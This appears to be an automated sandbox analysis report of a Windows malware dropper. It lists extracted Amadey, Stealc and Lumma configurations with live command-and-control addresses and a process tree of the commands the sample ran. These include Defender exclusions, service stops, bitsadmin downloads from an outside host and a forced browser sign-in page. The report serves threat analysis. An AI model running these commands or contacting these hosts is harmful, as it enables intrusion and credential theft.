Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 20:37

General

  • Target

    4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe

  • Size

    1.9MB

  • MD5

    b2f874f58722f67061a01726f43ce570

  • SHA1

    87572c77ec7d2ae7385f5855b337d2ddb530cb01

  • SHA256

    4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df

  • SHA512

    e3c955999c2573742e346058a4b3cc4e0f6350edb2c55bcd83cef00e6a28902da787ff47eae7c556753073e9d985ca706e1e866845881d7c18bd705c6d637782

  • SSDEEP

    49152:NzMZdtSFojAfiO4oC8KIjlrRT132upCb+A860u:NadtiZfiyDNpZB+b+A8z

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default_valenciga

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

lumma

C2

https://drive-connect.cyou

https://crib-endanger.sbs

https://faintbl0w.sbs

https://300snails.sbs

https://bored-light.sbs

https://3xc1aimbl0w.sbs

https://pull-trucker.sbs

https://fleez-inc.sbs

https://thicktoys.sbs

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://drive-connect.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 39 IoCs
  • Identifies Wine through registry keys 2 TTPs 18 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 9 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 9 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 50 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2540
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5988
    • C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe
      "C:\Users\Admin\AppData\Local\Temp\4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
        "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1900
        • C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe
          "C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4552
          • C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-FD8BV.tmp\stories.tmp" /SL5="$602BE,3274473,54272,C:\Users\Admin\AppData\Local\Temp\1011373001\stories.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:4516
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" pause video_jet_1235
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4660
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 pause video_jet_1235
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4360
            • C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe
              "C:\Users\Admin\AppData\Local\VideoJet 4.1.3.33\videojet3264.exe" -i
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:2964
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\ReUploaded_MrAnon.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2184
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2184 -s 348
            4⤵
            • Program crash
            PID:1700
        • C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe
          "C:\Users\Admin\AppData\Local\Temp\1011459001\b107b900a0.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4740
          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
            "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2660
            • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
              "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3572
            • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
              "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2908
              • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3492
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1280
                  7⤵
                  • Program crash
                  PID:3024
            • C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe
              "C:\Users\Admin\AppData\Local\Temp\1002824001\531cd8388c.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1924
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1496
                6⤵
                • Program crash
                PID:876
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1476
                6⤵
                • Program crash
                PID:364
            • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
              "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4672
              • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1944
                • C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe
                  "C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe"
                  7⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2316
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:6024
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    8⤵
                      PID:6280
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        9⤵
                          PID:6336
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop UsoSvc
                        8⤵
                        • Launches sc.exe
                        PID:6284
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        8⤵
                        • Launches sc.exe
                        PID:6324
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop wuauserv
                        8⤵
                        • Launches sc.exe
                        PID:5760
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop bits
                        8⤵
                        • Launches sc.exe
                        PID:6816
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop dosvc
                        8⤵
                        • Launches sc.exe
                        PID:6660
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        8⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6708
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        8⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6716
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        8⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6724
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        8⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6736
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe delete "QKJNEQWA"
                        8⤵
                        • Launches sc.exe
                        PID:6764
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
                        8⤵
                        • Launches sc.exe
                        PID:7100
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop eventlog
                        8⤵
                        • Launches sc.exe
                        PID:2564
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe start "QKJNEQWA"
                        8⤵
                        • Launches sc.exe
                        PID:1804
                • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
                  "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1052
                • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
                  "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
                  5⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:3776
                  • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                    "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                    6⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:428
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                      7⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:5856
                • C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
                  "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
                  5⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:5736
                • C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe
                  "C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1012
                  • C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-LDTKF.tmp\newwork.tmp" /SL5="$1602B6,3278395,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    PID:6104
                • C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe
                  "C:\Users\Admin\AppData\Local\Temp\1005208001\aa3d6bbb08.exe"
                  5⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:6552
                • C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe
                  "C:\Users\Admin\AppData\Local\Temp\1005209001\7b7ddf7558.exe"
                  5⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:6848
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1516
                    6⤵
                    • Program crash
                    PID:5716
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1536
                    6⤵
                    • Program crash
                    PID:5728
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1584
                    6⤵
                    • Program crash
                    PID:5772
            • C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe
              "C:\Users\Admin\AppData\Local\Temp\1011601001\0DMNix3.exe"
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1488
              • C:\Windows\SysWOW64\ping.exe
                ping -n 1 8.8.8.8
                4⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:5072
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
                4⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:2968
              • C:\Windows\SysWOW64\bitsadmin.exe
                bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolwx.rar" "C:\Users\Admin\AppData\Local\Temp\jstsolwx.rar"
                4⤵
                • Download via BitsAdmin
                • System Location Discovery: System Language Discovery
                PID:5404
            • C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe
              "C:\Users\Admin\AppData\Local\Temp\1011747001\e6a62fc7c5.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4352
            • C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe
              "C:\Users\Admin\AppData\Local\Temp\1011748001\b489200d48.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2020
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 1536
                4⤵
                • Program crash
                PID:996
            • C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe
              "C:\Users\Admin\AppData\Local\Temp\1011749001\46c1facbb6.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1860
            • C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe
              "C:\Users\Admin\AppData\Local\Temp\1011750001\2d898dd098.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2280
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4508
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3552
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2296
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:364
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                4⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3752
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                4⤵
                  PID:996
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    5⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:1308
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3b8ae0d-7e81-43a0-ae6a-78006e7a4579} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" gpu
                      6⤵
                        PID:1528
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2428 -prefMapHandle 2424 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2177f85a-32fc-433e-afdb-c963e8ea5bf8} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" socket
                        6⤵
                          PID:364
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3200 -childID 1 -isForBrowser -prefsHandle 2996 -prefMapHandle 2904 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0937c804-354e-4edd-8473-c59f833bb01e} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
                          6⤵
                            PID:3228
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3976 -childID 2 -isForBrowser -prefsHandle 3972 -prefMapHandle 3968 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7261c77-90db-4023-8e64-2f49813041c5} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
                            6⤵
                              PID:5224
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3984 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4748 -prefMapHandle 4728 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {275dffee-513b-435e-b226-8e4f929155ce} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" utility
                              6⤵
                              • Checks processor information in registry
                              PID:6060
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 3 -isForBrowser -prefsHandle 5416 -prefMapHandle 5572 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66def290-aba5-434c-8ed9-ded173d2ff50} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
                              6⤵
                                PID:7164
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 4 -isForBrowser -prefsHandle 5752 -prefMapHandle 5756 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d083865e-b484-49b6-9d43-674497a9b172} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
                                6⤵
                                  PID:5388
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6024 -childID 5 -isForBrowser -prefsHandle 5944 -prefMapHandle 5948 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fb760e7-5bbf-419b-84a9-c8b388979c02} 1308 "\\.\pipe\gecko-crash-server-pipe.1308" tab
                                  6⤵
                                    PID:5364
                            • C:\Users\Admin\AppData\Local\Temp\1011751001\a059e40180.exe
                              "C:\Users\Admin\AppData\Local\Temp\1011751001\a059e40180.exe"
                              3⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5208
                            • C:\Users\Admin\AppData\Local\Temp\1011752001\6c3a0fbc6f.exe
                              "C:\Users\Admin\AppData\Local\Temp\1011752001\6c3a0fbc6f.exe"
                              3⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              PID:5868
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 956
                                4⤵
                                • Program crash
                                PID:3004
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2184 -ip 2184
                          1⤵
                            PID:3552
                          • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                            1⤵
